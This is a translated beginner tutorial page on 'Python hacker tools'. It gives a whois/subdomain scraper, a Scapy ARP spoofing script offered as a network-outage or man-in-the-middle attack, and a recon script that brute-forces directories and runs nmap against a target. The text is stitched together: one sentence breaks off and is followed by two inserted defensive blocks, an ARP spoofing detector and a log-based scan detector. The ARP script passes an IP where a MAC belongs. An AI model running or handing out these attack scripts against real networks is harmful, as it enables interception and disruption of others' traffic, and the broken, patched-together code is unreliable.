2025-04-05 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article introduces how to get started with novice Python hacker tools. The content is detailed; interested readers can use it as a reference, and I hope it is helpful to you.
Getting started with Python hacker tools
Preface
To meet novices' interest in Python, this article features three entry-level Python starter tools. This first issue covers three entry-level tools, in the hope that novices will have a basic understanding of Python scripts after reading them.
Tool one: use the Python requests module to build a whois information collector
Tool two: write an ARP network-outage attack in Python
Tool three: directory information collection
Tool one, preface: for friends who want to write a project but don't know where to start, these scripts are easy to understand.
First, briefly sort out which features this tool needs. The script collects the following information:
IP information
Subdomain name
Filing record
Registrant
Email
Address
Telephone
DNS
The specific steps are as follows:
The module we are going to use is requests.
Python environment: py3
Installation method:
pip install requests or python setup.py install
The queries go through http://site.ip138.com:
http://site.ip138.com/<domain name you want to query>/domain.html    # this directory is used to query the IP resolution record
http://site.ip138.com/<domain name you want to query>/beian.html     # this is used to query the subdomain name
http://site.ip138.com/<domain name you want to query>/whois.html     # this is used for the whois query
All right, now let's start writing the code, which has detailed comments.
    # First, import requests, time, and BeautifulSoup from the bs4 module
    import requests
    import time
    from bs4 import BeautifulSoup

    # Record the start time
    strat = time.time()


    def chax():
        # Ask the user for the domain name to query
        lid = input('Please enter the domain name you want to query:')
        # Set the browser User-Agent header
        head = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
        # Build the URLs
        url = "http://site.ip138.com/{}/".format(lid)
        urldomain = "http://site.ip138.com/{}/domain.htm".format(lid)
        url2 = "http://site.ip138.com/{}/beian.htm".format(lid)
        url3 = "http://site.ip138.com/{}/whois.htm".format(lid)
        # Fetch the pages
        rb = requests.get(url, headers=head)
        rb1 = requests.get(urldomain, headers=head)
        rb2 = requests.get(url2, headers=head)
        rb3 = requests.get(url3, headers=head)
        # Parse the content and print the text of every <p> tag
        gf = BeautifulSoup(rb.content, 'html.parser')
        print('[+] IP parsing record')
        for x in gf.find_all('p'):
            link = x.get_text()
            print(link)
        gf1 = BeautifulSoup(rb1.content, 'html.parser')
        print('[+] subdomain name query')
        for v in gf1.find_all('p'):
            link2 = v.get_text()
            print(link2)
        gf2 = BeautifulSoup(rb2.content, 'html.parser')
        print('[+] filing query')
        for s in gf2.find_all('p'):
            link3 = s.get_text()
            print(link3)
        gf3 = BeautifulSoup(rb3.content, 'html.parser')
        print('[+] whois query')
        for k in gf3.find_all('p'):
            link4 = k.get_text()
            print(link4)


    chax()
    end = time.time()
    print('query time:', end - strat)
Tool two: write an ARP network-outage attack using Python
Do you know how ARP attacks work? If not, it doesn't matter. Here is an introduction.
The principle of the ARP attack:
ARP spoofing works by forging IP addresses and MAC addresses and sending a large amount of ARP traffic onto the network. As long as the attacker keeps sending ARP packets, the result can be a man-in-the-middle attack or a network outage. (PS: only a few parameters in Scapy are needed to achieve this.)
Scapy introduction:
Scapy is a Python program that enables users to send, sniff and parse and forge network packets. This feature allows you to build tools that can detect, scan, or attack the network.
In other words, Scapy is a powerful interactive packet handler. It can forge or decode packets of a large number of protocols, send them on the wire, capture them, match requests and replies, and so on. Scapy can easily handle most classic tasks such as scanning, tracing, probing, unit testing, attacks, or network discovery. It can replace hping, arpspoof, arp-sk, arping, pf, or even some parts of Nmap, tcpdump and tshark. A small example of scapy:
PS: for a guide to using Scapy properly, please read the introduction and some of the basics: [link]
Install scapy:
Py2 installation method:
pip install scapy
Py3 installation method:
pip install scapy3
More installation methods: [link]
My system environment: Kali Linux
Readers can also consider the following system environments:
CentOS
Ubuntu
macOS
PS: try not to use Windows; on Windows you will get an error!
The error says Windows.dll is missing, and after installing this DLL it reports an error again. The official project has not given a reply.
Write the script for the attack: Ether constructs the network packet, ARP builds the ARP attack payload, and sendp sends the packets.
    import os
    import sys
    from scapy.layers.l2 import getmacbyip
    from scapy.all import (
        Ether,
        ARP,
        sendp
    )

    # Run the command to view the IP
    ifconfig = os.system('ifconfig')
    print ifconfig
    gmac = raw_input('Please enter gateway IP:')
    liusheng = raw_input('Please enter your IP:')
    liusrc = raw_input('Please enter target IP:')
    try:
        # Get the MAC of the target
        tg = getmacbyip(liusrc)
        print tg
    except Exception, f:
        print '[-] {}'.format(f)
        exit()


    def arpspoof():
        try:
            eth = Ether()
            arp = ARP(
                op="is-at",      # ARP response
                hwsrc=gmac,      # gateway MAC
                psrc=liusheng,   # gateway IP
                hwdst=tg,        # target MAC
                pdst=liusrc      # target IP
            )
            # Print the configuration
            print((eth/arp).show())
            # Start sending packets
            sendp(eth/arp, inter=2, loop=1)
        except Exception, g:
            print '[-] {}'.format(g)
            exit()


    arpspoof()
From the victim's point of view,
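The forged is-at replies described above leave a visible trace on the wire: an IP address that suddenly maps to a different MAC. The following is an added example, not part of the original article, of a detector that parses raw Ethernet/ARP frames and flags such rebinding; the addresses, the frames and the function names are constructed for illustration, and nothing is sent on the network.

```python
import struct

def _mac(b): return ":".join("%02x" % x for x in b)
def _ip(b): return ".".join(str(x) for x in b)

def parse_arp(frame):
    """Return (op, eth_src, sender_mac, sender_ip) for an IPv4-over-Ethernet ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":   # EtherType 0x0806 = ARP
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, _mac(frame[6:12]), _mac(frame[22:28]), _ip(frame[28:32])

def detect_spoofing(frames, trusted=None):
    """Return (frame_index, ip, reason) alerts. `trusted` optionally pins known IP -> MAC pairs."""
    bindings = dict(trusted or {})
    alerts = []
    for n, frame in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        _op, eth_src, hwsrc, psrc = parsed   # requests and replies can both update ARP caches
        if eth_src != hwsrc:
            alerts.append((n, psrc, "ethernet source %s differs from ARP sender %s" % (eth_src, hwsrc)))
        known = bindings.setdefault(psrc, hwsrc)   # an unpinned IP is learned on first sighting
        if known != hwsrc:
            alerts.append((n, psrc, "binding changed %s -> %s" % (known, hwsrc)))
    return alerts

def sample_reply(eth_src, hwsrc, psrc, hwdst, pdst):
    """Constructed 42-byte ARP is-at frame used only as test input (nothing is sent)."""
    m = lambda s: bytes(int(x, 16) for x in s.split(":"))
    i = lambda s: bytes(int(x) for x in s.split("."))
    return (m(hwdst) + m(eth_src) + b"\x08\x06" + struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
            + m(hwsrc) + i(psrc) + m(hwdst) + i(pdst))

GW, HOST = "192.168.1.1", "192.168.1.50"             # constructed addresses
GW_MAC, HOST_MAC, ROGUE_MAC = "aa:aa:aa:aa:aa:01", "aa:aa:aa:aa:aa:50", "aa:aa:aa:aa:aa:66"
SAMPLE = [
    sample_reply(GW_MAC, GW_MAC, GW, HOST_MAC, HOST),        # genuine gateway reply
    sample_reply(ROGUE_MAC, ROGUE_MAC, GW, HOST_MAC, HOST),  # gateway IP rebound to another MAC
    sample_reply(ROGUE_MAC, GW_MAC, GW, HOST_MAC, HOST),     # sender field disagrees with frame source
    b"\x00" * 60,                                            # non-ARP frame, ignored
]

if __name__ == "__main__":
    for alert in detect_spoofing(SAMPLE):
        print(alert)
```

Passing the gateway's real address as `trusted` avoids learning a forged binding when the spoofed reply happens to be seen first.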
Tool three: if you want to find web vulnerabilities, you must first do a good job of information collection.
Let's write a script to collect information.
Prepare:
Install the requests and bs4 modules: pip install requests, pip install bs4, or download the corresponding module package, find setup.py and run python setup.py install
Idea:
use requests headers to obtain the HTTP header information
use the HTTP response code to determine whether robots.txt exists
use the HTTP response code to determine whether directories exist
use nmap to determine the open ports (PS: here I use the os module to run the nmap command, because as soon as the nmap module is called on my side, nmap stops running)
crawl a website to obtain the corresponding whois and IP reverse-lookup domain name information
Start:
    import requests
    import os
    import socket
    from bs4 import BeautifulSoup
    import time

    # Browser User-Agent sent with every request
    header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}


    # Obtain the HTTP fingerprint (response headers)
    def Webfingerprintcollection():
        global lgr
        lgr = input('Please enter the target domain name:')
        url = "http://{}".format(lgr)
        r = requests.get(url, headers=header)
        xyt = r.headers
        for key in xyt:
            print(key, ':', xyt[key])


    Webfingerprintcollection()
    print('================')


    # Check whether robots.txt exists
    def robots():
        urlsd = "http://{}/robots.txt".format(lgr)
        gf = requests.get(urlsd, headers=header, timeout=8)
        if gf.status_code == 200:
            print('robots.txt exists')
            print('[+] the site exists robots.txt', urlsd)
        else:
            print('[-] no robots.txt')


    robots()
    print("================")


    # Directory scan: request every path listed in build.txt
    def Webdirectoryscanner():
        wordlist = open('build.txt', 'r').read().split('\n')
        for xyt in wordlist:
            try:
                urljc = "http://" + lgr + "{}".format(xyt)
                rvc = requests.get(urljc, headers=header, timeout=8)
                if rvc.status_code == 200:
                    print('[*]', urljc)
            except requests.RequestException:
                print('[-] remote host forcibly closes an existing connection')


    Webdirectoryscanner()
    print("================")

    s = socket.gethostbyname(lgr)


    # Port scan: run the nmap command through the os module
    def portscanner():
        o = os.system('nmap {}'.format(s))
        print(o)


    portscanner()
    print('================')


    # whois query
    def whois():
        urlwhois = "http://site.ip138.com/{}/whois.htm".format(lgr)
        rvt = requests.get(urlwhois, headers=header)
        bv = BeautifulSoup(rvt.content, "html.parser")
        for line in bv.find_all('p'):
            link = line.get_text()
            print(link)


    whois()
    print('================')


    # IP reverse lookup of domain names
    def IPbackupdomainname():
        wu = socket.gethostbyname(lgr)
        rks = "http://site.ip138.com/{}/".format(wu)
        sjk = requests.get(rks, headers=header)
        liverou = BeautifulSoup(sjk.content, 'html.parser')
        for low in liverou.find_all('li'):
            bc = low.get_text()
            print(bc)


    IPbackupdomainname()
    print('================')
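On the server side, the robots.txt check and directory scan above show up in the access log as one client requesting many distinct paths and receiving mostly 404 responses. The following is an added example, not part of the original article, of detection logic over Combined Log Format lines; the log lines, the thresholds and the function names are constructed assumptions.

```python
import re
from collections import defaultdict

# Combined Log Format: ip - - [time] "METHOD path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

def find_directory_scans(lines, min_paths=5, min_miss_ratio=0.8):
    """Return {client_ip: stats} for clients that request many distinct paths
    and get mostly 404s back, the footprint of wordlist-driven probing."""
    seen = defaultdict(lambda: {"paths": set(), "miss": 0, "total": 0, "agents": set()})
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                      # skip lines that are not in the expected format
        ip, _method, path, status, agent = m.groups()
        s = seen[ip]
        s["paths"].add(path.split("?", 1)[0])
        s["total"] += 1
        s["miss"] += status == "404"
        s["agents"].add(agent)
    flagged = {}
    for ip, s in seen.items():
        ratio = s["miss"] / s["total"]
        if len(s["paths"]) >= min_paths and ratio >= min_miss_ratio:
            flagged[ip] = {"distinct_paths": len(s["paths"]),
                           "miss_ratio": round(ratio, 2),
                           "robots_probe": "/robots.txt" in s["paths"],
                           "single_agent": len(s["agents"]) == 1}
    return flagged

# Constructed sample log (documentation IP ranges); the User-Agent is the one hard-coded in the script.
UA = ("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36")

def _line(ip, path, status):
    return '%s - - [05/Apr/2025:10:00:00 +0000] "GET %s HTTP/1.1" %d 512 "-" "%s"' % (ip, path, status, UA)

SCAN_PATHS = ["/robots.txt", "/admin/", "/backup/", "/login.php", "/phpmyadmin/", "/test/", "/old/"]
SAMPLE_LOG = ([_line("203.0.113.7", p, 200 if p == "/login.php" else 404) for p in SCAN_PATHS]
              + [_line("198.51.100.20", p, st) for p, st in
                 [("/", 200), ("/index.html", 200), ("/css/site.css", 200), ("/about", 200), ("/missing.png", 404)]])

if __name__ == "__main__":
    print(find_directory_scans(SAMPLE_LOG))
```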
That is all for how to get started with novice Python hacker tools. I hope the above content is of some help to you and lets you learn more. If you think the article is good, you can share it so more people can see it.